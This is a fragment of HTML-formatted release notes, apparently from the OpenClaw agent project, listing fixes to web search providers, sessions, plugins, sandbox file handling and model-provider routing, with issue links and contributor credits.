<p>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</p>
</li>
<li>
<p>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</p>
</li>
<li>
<p>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</p>
</li>
<li>
<p>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</p>
</li>
<li>
<p>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</p>
</li>
<li>
<p>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</p>
</li>
<li>
<p>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</p>
</li>
<li>
<p>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</p>
</li>
<li>
<p>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joelnishanth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joelnishanth">@joelnishanth</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjhddh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjhddh">@sjhddh</a>.</p>
</li>
<li>
<p>Sessions: suppress exact inter-session control replies such as <code>NO_REPLY</code> and keep agent-to-agent announce bookkeeping out of visible transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123622416" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53145/hovercard" href="https://github.com/openclaw/openclaw/issues/53145">#53145</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TarahAssistant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TarahAssistant">@TarahAssistant</a>.</p>
</li>
<li>
<p>CLI/directory: report unsupported directory operations for installed channel plugins instead of prompting to reinstall the plugin when it lacks a directory adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365917479" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75770" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75770/hovercard" href="https://github.com/openclaw/openclaw/issues/75770">#75770</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lawong888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lawong888">@lawong888</a>.</p>
</li>
<li>
<p>Web search/SearXNG: show the JSON API <code>search.formats</code> prerequisite during SearXNG setup before prompting for the base URL. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4250289649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65592" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65592/hovercard" href="https://github.com/openclaw/openclaw/pull/65592">#65592</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evanpaul14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evanpaul14">@evanpaul14</a>.</p>
</li>
<li>
<p>Web search/SearXNG: pass through <code>img_src</code> image URLs from SearXNG image-category results. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207995751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61416" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61416/hovercard" href="https://github.com/openclaw/openclaw/pull/61416">#61416</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sghael/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sghael">@sghael</a>.</p>
</li>
<li>
<p>Web search/Kimi: fail explicitly when Moonshot returns an ungrounded chat answer instead of native web-search evidence, so Kimi no longer reports generic fallback text as a successful search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117727594" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52573" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52573/hovercard" href="https://github.com/openclaw/openclaw/issues/52573">#52573</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangwllu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangwllu">@wangwllu</a>.</p>
</li>
<li>
<p>Web search: keep public provider requests on the strict SSRF guard and reserve private-network access for explicit self-hosted SearXNG/Firecrawl endpoints. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350921258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74357" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74357/hovercard" href="https://github.com/openclaw/openclaw/issues/74357">#74357</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350976183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74360/hovercard" href="https://github.com/openclaw/openclaw/pull/74360">#74360</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fede-kamel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fede-kamel">@fede-kamel</a>.</p>
</li>
<li>
<p>Firecrawl: reject private, loopback, metadata, and non-HTTP(S) <code>firecrawl_scrape</code> target URLs before forwarding them to Firecrawl. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081587848" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48133" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48133/hovercard" href="https://github.com/openclaw/openclaw/pull/48133">#48133</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kn1ghtc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kn1ghtc">@kn1ghtc</a>.</p>
</li>
<li>
<p>Web search/Firecrawl: allow self-hosted private/internal Firecrawl <code>baseUrl</code> endpoints, including HTTP for private targets, while keeping hosted Firecrawl on the strict official endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234128169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63877/hovercard" href="https://github.com/openclaw/openclaw/issues/63877">#63877</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4194271236" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59666" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/59666/hovercard" href="https://github.com/openclaw/openclaw/pull/59666">#59666</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235261313" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63941" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63941/hovercard" href="https://github.com/openclaw/openclaw/pull/63941">#63941</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347547141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74013" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74013/hovercard" href="https://github.com/openclaw/openclaw/pull/74013">#74013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhthompson12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhthompson12">@jhthompson12</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jzakirov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jzakirov">@jzakirov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mlightsnow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mlightsnow">@Mlightsnow</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shad0wca7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shad0wca7">@shad0wca7</a>.</p>
</li>
<li>
<p>CLI/models: report gateway model fallback attempts in <code>infer model run --json</code> and avoid double-prefixing provider-qualified defaults such as <code>openrouter/auto</code> in <code>models status</code>. Partially fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299726655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69527" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69527/hovercard" href="https://github.com/openclaw/openclaw/issues/69527">#69527</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexifra/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexifra">@alexifra</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: strip trailing assistant prefill turns from verified OpenRouter Anthropic model requests when reasoning is enabled, so Claude 4.6 routes no longer fail with Anthropic's prefill rejection through the OpenAI-compatible adapter. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362626247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75395" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75395/hovercard" href="https://github.com/openclaw/openclaw/issues/75395">#75395</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sbmilburn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sbmilburn">@sbmilburn</a>.</p>
</li>
<li>
<p>Voice Call: add per-number inbound routing for dialed-number greetings, response agents/models/prompts, and TTS voice overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161590255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56604" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56604/hovercard" href="https://github.com/openclaw/openclaw/issues/56604">#56604</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/healthstatus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/healthstatus">@healthstatus</a>.</p>
</li>
<li>
<p>Feishu: preserve Feishu/Lark HTTP error bodies for message sends, media sends, and chat member lookups, so HTTP 400 failures include vendor code, message, log id, and troubleshooter details. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346852455" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73860" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73860/hovercard" href="https://github.com/openclaw/openclaw/issues/73860">#73860</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/desksk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/desksk">@desksk</a>.</p>
</li>
<li>
<p>Agents/transcripts: avoid reopening large Pi transcript files through the synchronous session manager for maintenance rewrites, persisted tool-result truncation, manual compaction boundary hardening, and queued compaction rotation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Web search/Exa: accept <code>plugins.entries.exa.config.webSearch.baseUrl</code>, normalize it to the Exa <code>/search</code> endpoint, and partition cached results by endpoint. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140768584" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54928" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54928/hovercard" href="https://github.com/openclaw/openclaw/issues/54928">#54928</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4140867375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54939/hovercard" href="https://github.com/openclaw/openclaw/pull/54939">#54939</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mrpl327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mrpl327">@mrpl327</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</p>
</li>
<li>
<p>Web search/MiniMax: include MiniMax Search in the web-search setup flow and let <code>MINIMAX_API_KEY</code> participate in MiniMax Search auto-detection. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252993330" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65828" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65828/hovercard" href="https://github.com/openclaw/openclaw/pull/65828">#65828</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: preserve official source-linked trust through archive installs, so OpenClaw can install trusted ClawHub plugin packages that trigger the built-in dangerous-pattern scanner. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: install package runtime dependencies for archive-backed plugin installs, so ClawHub packages such as WhatsApp load declared dependencies after download. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cache repeated plugin tool factory results only for matching request context, reducing per-turn tool prep without leaking sandbox, session, browser, delivery, or runtime config state. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367960262" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75956/hovercard" href="https://github.com/openclaw/openclaw/issues/75956">#75956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Providers/LM Studio: allow <code>models.providers.lmstudio.params.preload: false</code> to skip OpenClaw's native model-load call so LM Studio JIT loading, idle TTL, and auto-evict can own model lifecycle. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367728807" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75921" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75921/hovercard" href="https://github.com/openclaw/openclaw/issues/75921">#75921</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/garyd9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/garyd9">@garyd9</a>.</p>
</li>
<li>
<p>Agents/transcripts: keep chat history, restart recovery, fork token checks, and stale-token compaction checks on bounded async transcript reads or cached async indexes instead of reparsing large session files. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</p>
</li>
<li>
<p>Telegram: inherit the process DNS result order for Bot API transport and downgrade recovered sticky IPv4 fallback promotions to debug logs, while keeping pinned-IP escalation warnings visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367563919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75904/hovercard" href="https://github.com/openclaw/openclaw/issues/75904">#75904</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/highfly-hi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/highfly-hi">@highfly-hi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</p>
</li>
<li>
<p>Sessions: keep durable external conversation pointers, including group and thread-scoped chat sessions, out of age, count, and disk-budget maintenance eviction while still allowing synthetic runtime entries to age out. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175356638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58088" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58088/hovercard" href="https://github.com/openclaw/openclaw/issues/58088">#58088</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drinkflav/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drinkflav">@drinkflav</a>.</p>
</li>
<li>
<p>Web search/MiniMax: allow <code>MINIMAX_OAUTH_TOKEN</code> to satisfy MiniMax Search credentials, so OAuth-authorized MiniMax Token Plan setups do not need a separate web-search key. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4252008941" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65768" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65768/hovercard" href="https://github.com/openclaw/openclaw/issues/65768">#65768</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kikibrian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kikibrian">@kikibrian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>.</p>
</li>
<li>
<p>Providers/MiniMax: derive Coding Plan usage polling from the configured MiniMax base URL, so global setups no longer query the CN usage host. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246049228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65054/hovercard" href="https://github.com/openclaw/openclaw/issues/65054">#65054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sixone74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sixone74">@sixone74</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Yanhu007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Yanhu007">@Yanhu007</a>.</p>
</li>
<li>
<p>Control UI/WebChat: skip assistant-media transcript supplements when stale media refs resolve to no playable media, so text-only final replies are not stored a second time as gateway-injected assistant messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347391100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73956" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73956/hovercard" href="https://github.com/openclaw/openclaw/issues/73956">#73956</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HemantSudarshan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HemantSudarshan">@HemantSudarshan</a>.</p>
</li>
<li>
<p>Sessions: reject <code>sessions_send</code> targets that resolve to thread-scoped chat sessions, so inter-agent coordination cannot be injected into active human-facing Slack or Discord threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117274546" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52496/hovercard" href="https://github.com/openclaw/openclaw/issues/52496">#52496</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/barry-p5cc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/barry-p5cc">@barry-p5cc</a>.</p>
</li>
<li>
